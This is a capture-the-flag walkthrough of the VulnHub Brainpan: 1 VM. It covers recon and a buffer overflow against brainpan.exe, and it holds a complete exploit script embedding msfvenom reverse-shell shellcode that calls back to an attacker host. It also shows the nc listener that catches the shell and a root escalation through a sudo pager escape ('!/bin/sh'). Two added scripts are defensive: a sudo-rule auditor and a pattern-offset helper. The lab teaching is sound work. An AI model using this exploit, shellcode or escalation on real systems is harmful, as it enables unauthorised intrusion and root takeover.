INFO BRAINPAN: 1
About Release
• Name: Brainpan: 1
• Date release: 20 Mar 2013
• Author: superkojiman
• Series: Brainpan
• Web page: http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html
Download
Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQ sections dealing with the dangers of running unknown VMs and our suggestions for "protecting yourself and your network". If you understand the risks, please download!
• Brainpan.zip (Size: 809 MB)
• Download (Mirror): https://download.vulnhub.com/brainpan/Brainpan.zip
Description
[ASCII-art "brainpan" banner]
by superkojiman
http://www.techorganic.com
DISCLAIMER
By using this virtual machine, you agree that in no event will I be liable
for any loss or damage including without limitation, indirect or
consequential loss or damage, or any loss or damage whatsoever arising
from loss of data or profits arising out of or in connection with the use
of this software.
TL;DR: If something bad happens, it’s not my fault.
SETUP
Brainpan has been tested and found to work on the following hypervisors:
- VMware Player 5.0.1
- VMWare Fusion 5.0
- VirtualBox 4.2.8
Import Brainpan into your preferred hypervisor and configure the network
settings to your needs. It will get an IP address via DHCP, but it’s
recommended you run it within a NAT or visible to the host OS only since it
is vulnerable to attacks.
Source: Brainpan.zip/readme.txt
MD5 (brainpan.ova) = fc0f163220b9884df5dcc9cdc45361e4
Source: Brainpan.zip/md5.txt
Exclusive to VulnHub!
File Information
• Filename: Brainpan.zip
• File size: 809 MB
• MD5: 0F99E72F0703E4619B5E08604778F673
• SHA1: E424613FD0137C0688A865623CCBB4D92DFE8209
Virtual Machine
• Format: Virtual Machine (Virtualbox - VDI)
• Operating System: Linux
Networking
• DHCP service: Enabled
• IP address: Automatically assign
Information gathering
Currently scanning: 172.16.28.0/16 | Screen View: Unique Hosts
81 Captured ARP Req/Rep packets, from 4 hosts. Total size: 4860
IP              At MAC Address     Count  Len  MAC Vendor / Hostname
192.168.110.1   00:50:56:c0:00:08   73   4380  VMware, Inc.
192.168.110.2   00:50:56:eb:bc:ce    2    120  VMware, Inc.
192.168.110.129 00:0c:29:08:4e:3a    3    180  VMware, Inc.
192.168.110.254 00:50:56:fb:07:43    3    180  VMware, Inc.
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap 192.168.110.0/24 -T4
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-10 23:24 CST
Nmap scan report for 192.168.110.2 (192.168.110.2)
Host is up (0.00039s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
Nmap scan report for 192.168.110.128 (192.168.110.128)
Host is up (0.00031s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 192.168.110.129 (192.168.110.129)
Host is up (0.0033s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
9999/tcp open abyss
10000/tcp open snet-sensor-mgmt
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.14 seconds
┌──(pinginglab㉿pinginglab)-[~]
└─$ ping 192.168.110.129
PING 192.168.110.129 (192.168.110.129) 56(84) bytes of data.
64 bytes from 192.168.110.129: icmp_seq=1 ttl=64 time=0.456 ms
64 bytes from 192.168.110.129: icmp_seq=2 ttl=64 time=0.278 ms
64 bytes from 192.168.110.129: icmp_seq=3 ttl=64 time=0.159 ms
64 bytes from 192.168.110.129: icmp_seq=4 ttl=64 time=0.289 ms
^C
--- 192.168.110.129 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3056ms
rtt min/avg/max/mdev = 0.159/0.295/0.456/0.105 ms
┌──(pinginglab㉿pinginglab)-[~]
└─$ nmap -A 192.168.110.129 -T4
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-10 23:24 CST
Nmap scan report for 192.168.110.129 (192.168.110.129)
Host is up (0.0015s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
|     [ASCII-art "brainpan" banner]
| [__________ WELCOME TO BRAINPAN ]
| ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.92%I=7%D=6/10%Time=648495C1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,298,"|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20|\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\n|||\x20\x20\x20\x20|\x20\x20||\x20\x20\x20\x20|||
SF:\x20\x20\x20\x20\x20\x20|||\x20\x20\x20\x20|||\x20\x20\x20
SF:x20\x20\x20|||\x20\x20|||\x20\x20\n|\x20\x20\x20\x20|\x
SF:20\x20_||\x20\x20\x20\x20\x20\x20|\x20\x20\x20\x20_|\x20\x20_|\x
SF:20\x20_|\x20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\x20\x20_|\x
SF:20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\n_|\x20\x20\x20\x20_|
SF:\x20\x20_|\x20\x20\x20\x20\x20\x20\x20\x20_|\x20\x20\x20\x20_|\x20\x
SF:20_|\x20\x20_|\x20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\x20\x
SF:20_|\x20\x20\x20\x20_|\x20\x20_|\x20\x20\x20\x20_|\n_|||\x20\x
SF:20\x20\x20_|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_|||\x20\x20_
SF:|\x20\x20_|\x20\x20\x20\x20_|\x20\x20_|||\x20\x20\x20\x20\x20\x
SF:20_|||\x20\x20_|\x20\x20\x20\x20_|\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20_|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:x20\x20_|\n\n[\x20WELCOME\x20TO\x20BRAINPAN\x
SF:20_]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTER\x
SF:20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\n
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.58 seconds
Use dirb to find accessible directories
┌──(pinginglab㉿pinginglab)-[~]
└─$ dirb http://192.168.110.129:10000/
DIRB v2.22 By The Dark Raver
START_TIME: Sun Jun 11 10:14:20 2023
URL_BASE: http://192.168.110.129:10000/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.110.129:10000/ ----
+ http://192.168.110.129:10000/bin (CODE:301|SIZE:0)
- http://192.168.110.129:10000/index.html (CODE:200|SIZE:215)
END_TIME: Sun Jun 11 10:18:14 2023
DOWNLOADED: 4612 - FOUND: 2
┌──(pinginglab㉿pinginglab)-[~]
└─$
Found a file that can be downloaded
Download it and try running it
Try decompiling the file
Try logging in with the password obtained from decompiling
Try the pwn approach
import sys, socket

# Crash test: send 1000 'A' bytes as the password and see whether the service survives
payload = b'A' * 1000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], int(sys.argv[2])))   # target host and port from the command line
print(s.recv(1024))                          # banner and password prompt
s.send(payload)
print(s.recv(1024))                          # empty or connection reset if the service crashed
s.close()
Referring to other people's blog posts
Author: l2sec
Source:
This site uses the "CC BY 4.0" Creative Commons licence; when reposting, please credit the author and source in a prominent place in the article.
┌──(pinginglab㉿pinginglab)-[~/oscp/pwn]
└─$ nc -lvvp 6666
listening on [any] 6666 …
connect to [192.168.110.128] from 192.168.110.129 [192.168.110.129] 57603
ls
checksrv.sh
web
dir
checksrv.sh web
cat chesrv.sh
cat: chesrv.sh: No such file or directory
ls
checksrv.sh
web
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
cd web
ls
bin
index.html
soss-infographic-final.png
cd ..
ls
checksrv.sh
web
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
cat checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep brainpan.exe | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
        killall wineserver
        killall winedevice.exe
    fi
    /usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
    pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
    if [[ ! -z $pid ]]; then
        kill -9 $pid
    fi
    cd /home/puck/web
    /usr/bin/python -m SimpleHTTPServer 10000
fi
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
python -c "import pty:pty.spawn('/bin/bash')"
  File "<string>", line 1
    import pty:pty.spawn('/bin/bash')
              ^
SyntaxError: invalid syntax
python -c "import pty;pty.spawn('/bin/bash')"
puck@brainpan:/home/puck$ dir
dir
checksrv.sh web
puck@brainpan:/home/puck$ ls
ls
checksrv.sh web
puck@brainpan:/home/puck$ sudo /bin/sh
sudo /bin/sh
[sudo] password for puck: puck
Sorry, try again.
[sudo] password for puck:
Sorry, try again.
[sudo] password for puck:
Sorry, try again.
sudo: 3 incorrect password attempts
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
LS(1)                            User Commands                            LS(1)

NAME
       ls - list directory contents

SYNOPSIS
       ls [OPTION]... [FILE]...

DESCRIPTION
       List information about the FILEs (the current directory by default).
       Sort entries alphabetically if none of -cftuvSUX nor --sort is specified.

       Mandatory arguments to long options are mandatory for short options too.

       -a, --all
              do not ignore entries starting with .
Manual page ls(1) line 1 (press h for help or q to quit)
[... remainder of the ls(1) manual page as paged by less, including the less help screen opened with h, omitted ...]
Manual page ls(1) line 33 (press h for help or q to quit)q
puck@brainpan:/home/puck$
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)
LS(1)                            User Commands                            LS(1)

NAME
       ls - list directory contents
[... ls(1) manual page omitted ...]
Manual page ls(1) line 1 (press h for help or q to quit)!/bin/sh
!/bin/sh
ls
ls
cs de.UTF-8 fr hu ja man2 man5 man8 pl.UTF-8 ru tr
da es fr.UTF-8 id ko man3 man6 nl pt sl zh_CN
de fi gl it man1 man4 man7 pl pt_BR sv zh_TW
cd /root
cd /root
id
id
uid=0(root) gid=0(root) groups=0(root)
ls
ls
b.txt
cat b.txt
cat b.txt
[ASCII-art "brainpan" banner]
http://www.techorganic.com
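The root shell above came from a sudo rule that lets puck run, as root and without a password, a helper living in another user's home directory whose "manual" action hands the caller an interactive pager. A defender-side check for exactly that class of rule, written as an added example (it is not part of the original write-up or of the Brainpan VM): it parses the text that `sudo -l` prints and flags rules that run as root without a password, point at a binary outside the package-managed bin directories, or invoke a pager or editor that can spawn a shell. The sample `sudo -l` text is constructed for the example and mirrors the output shown above plus two invented rules for contrast; `TRUSTED_PREFIXES` and `SHELL_ESCAPE_CAPABLE` are illustrative lists chosen here, not a complete policy.

```python
"""Audit `sudo -l` output for rules that hand a user root through an escapable program."""
import re

# Directories where package-managed binaries live; anything else is worth a look.
TRUSTED_PREFIXES = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/")

# Commands whose normal operation drops the user into a pager or editor that can
# run a shell command (the `!/bin/sh` trick). Illustrative, not exhaustive.
SHELL_ESCAPE_CAPABLE = {"man", "less", "more", "vi", "vim"}

# "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")

# Constructed sample: the Brainpan rule plus two made-up rules for comparison.
SAMPLE_SUDO_L = """\
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
    (root) /usr/bin/less /var/log/syslog
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get update
"""


def parse_rules(text):
    """Return (runas, tags, command) tuples from the rules section of `sudo -l`."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = {t.strip(": ") for t in m.group("tags").split() if t.strip()}
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def assess_rule(runas, tags, cmd):
    """Findings for one rule; an empty list means nothing was flagged."""
    findings = []
    binary = cmd.split()[0]
    as_root = runas.split(":")[0].strip() in ("root", "ALL")
    if as_root and "NOPASSWD" in tags:
        findings.append("runs as root without a password")
    if not binary.startswith(TRUSTED_PREFIXES):
        findings.append("binary outside the system bin directories: %s" % binary)
    if binary.rsplit("/", 1)[-1] in SHELL_ESCAPE_CAPABLE:
        findings.append("command can spawn an interactive shell")
    return findings


def audit(text):
    """Map each rule's command string to its list of findings."""
    return {cmd: assess_rule(runas, tags, cmd) for runas, tags, cmd in parse_rules(text)}


if __name__ == "__main__":
    for cmd, findings in audit(SAMPLE_SUDO_L).items():
        print(cmd, "->", "; ".join(findings) or "ok")
```

The anansi_util rule trips two checks at once (root, no password, and a binary under /home that nobody package-manages), which is the combination worth reviewing first; the wrapper's `manual` action is opaque to this parser, so the pager check only fires when the pager itself is the sudo target, as in the constructed `less` rule.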
┌──(pinginglab㉿pinginglab)-[~/oscp/pwn]
└─$ msfvenom -p linux/x86/shell_reverse_tcp -b "\x00" LHOST=192.168.110.128 LPORT=6666 -f python
To use retry middleware with Faraday v2.0+, install faraday-retry gem
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf = b""
buf += b"\xdb\xda\xb8\x16\x19\x26\xae\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x12\x83\xc2\x04\x31\x42\x13\x03\x54\x0a\xc4"
buf += b"\x5b\x69\xf7\xff\x47\xda\x44\x53\xe2\xde\xc3\xb2\x42"
buf += b"\xb8\x1e\xb4\x30\x1d\x11\x8a\xfb\x1d\x18\x8c\xfa\x75"
buf += b"\x5b\xc6\x93\x05\x33\x15\x6c\x1f\xce\x90\x8d\xaf\xa8"
buf += b"\xf2\x1c\x9c\x87\xf0\x17\xc3\x25\x76\x75\x6b\xd8\x58"
buf += b"\x09\x03\x4c\x88\xc2\xb1\xe5\x5f\xff\x67\xa5\xd6\xe1"
buf += b"\x37\x42\x24\x61"
┌──(pinginglab㉿pinginglab)-[~/oscp/pwn]
└─$
import socket

# Step 1: send a cyclic (non-repeating) pattern instead of plain 'A's, so the
# value that ends up in EIP identifies the exact position of the overwrite.
# buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
buffer_1000 = b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
buffer_1500 = b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))      # local copy of brainpan.exe running under a debugger
s.send(buffer_1000)
print(s.recv(1024))
s.close()

# The debugger shows EIP = 0x35724134 after the crash; look that value up in the pattern
# (run in the shell, not in Python):
#   ./pattern_offset.rb -q 35724134
#   [*] Exact match at offset 524

# Step 2: confirm the offset: 524 bytes of padding, then the 4 bytes that should land in EIP
# buffer = b'A' * 524 + b'C' * (1000 - 524)
buffer = b'A' * 524 + b'B' * 4 + b'C' * (1000 - 520)

# Step 3: final payload against the target
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.110.129", 9999))
junk = b"\x41" * 524                 # padding up to the saved return address
eip = b"\xf3\x12\x17\x31"            # 0x311712f3 in little-endian order, overwrites EIP
shellcode = b"\x90" * 50             # NOP sled ahead of the encoded payload
# Earlier msfvenom output (str form); superseded by the bytes version below.
# buf = ""
# buf += "\xda\xcd\xba\x11\xe7\x27\xad\xd9\x74\x24\xf4\x58\x29"
# buf += "\xc9\xb1\x12\x83\xe8\xfc\x31\x50\x13\x03\x41\xf4\xc5"
# buf += "\x58\x50\x21\xfe\x40\xc1\x96\x52\xed\xe7\x91\xb4\x41"
# buf += "\x81\x6c\xb6\x31\x14\xdf\x88\xf8\x26\x56\x8e\xfb\x4e"
# buf += "\xa9\xd8\x75\x18\x41\x1b\x86\x26\x08\x92\x67\x96\x4a"
# buf += "\xf5\x36\x85\x21\xf6\x31\xc8\x8b\x79\x13\x62\x7a\x55"
# buf += "\xe7\x1a\xea\x86\x28\xb8\x83\x51\xd5\x6e\x07\xeb\xfb"
# buf += "\x3e\xac\x26\x7b"
buf = b""
buf += b"\xdb\xda\xb8\x16\x19\x26\xae\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x12\x83\xc2\x04\x31\x42\x13\x03\x54\x0a\xc4"
buf += b"\x5b\x69\xf7\xff\x47\xda\x44\x53\xe2\xde\xc3\xb2\x42"
buf += b"\xb8\x1e\xb4\x30\x1d\x11\x8a\xfb\x1d\x18\x8c\xfa\x75"
buf += b"\x5b\xc6\x93\x05\x33\x15\x6c\x1f\xce\x90\x8d\xaf\xa8"
buf += b"\xf2\x1c\x9c\x87\xf0\x17\xc3\x25\x76\x75\x6b\xd8\x58"
buf += b"\x09\x03\x4c\x88\xc2\xb1\xe5\x5f\xff\x67\xa5\xd6\xe1"
buf += b"\x37\x42\x24\x61"
payload = junk + eip + shellcode + buf
s.send(payload)
print(s.recv(1024))
s.close()
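The write-up finds the overwrite position by sending the "Aa0Aa1..." pattern and feeding the crashed EIP value to pattern_offset.rb. The same two steps, reimplemented here as an added example (it is not the write-up's code or Metasploit's), make the reasoning explicit: the pattern is built from upper/lower/digit triplets so that every 4-byte window occurs exactly once, and the register value shown by the debugger is byte-reversed (x86 is little-endian) before it is searched for. The functions and their names are this example's own; the crash value 35724134 and the expected offset 524 are the ones reported above.

```python
"""Cyclic pattern generation and crash-value offset lookup for crash triage."""
import string


def cyclic_pattern(length):
    """Metasploit-style pattern: 'Aa0Aa1...' triplets, truncated to `length` bytes."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]      # only reached for lengths beyond 20280


def crash_value_to_bytes(hex_value):
    """Bytes as they sat in memory for a register value printed by the debugger.

    '35724134' is how the debugger shows EIP; in memory those four bytes were
    stored little-endian, so reversing them recovers the input characters."""
    return bytes.fromhex(hex_value)[::-1]


def pattern_offset(hex_value, length=1000):
    """Offset of the crash value inside a pattern of `length` bytes, or -1 if absent."""
    needle = crash_value_to_bytes(hex_value).decode("ascii")
    return cyclic_pattern(length).find(needle)


def all_windows_unique(pattern, width=4):
    """True when every `width`-byte window occurs once, i.e. the lookup is unambiguous."""
    windows = [pattern[i:i + width] for i in range(len(pattern) - width + 1)]
    return len(windows) == len(set(windows))


if __name__ == "__main__":
    p = cyclic_pattern(1000)
    print("4-byte windows unique:", all_windows_unique(p))
    print("EIP 0x35724134 ->", crash_value_to_bytes("35724134"),
          "at offset", pattern_offset("35724134"))
```

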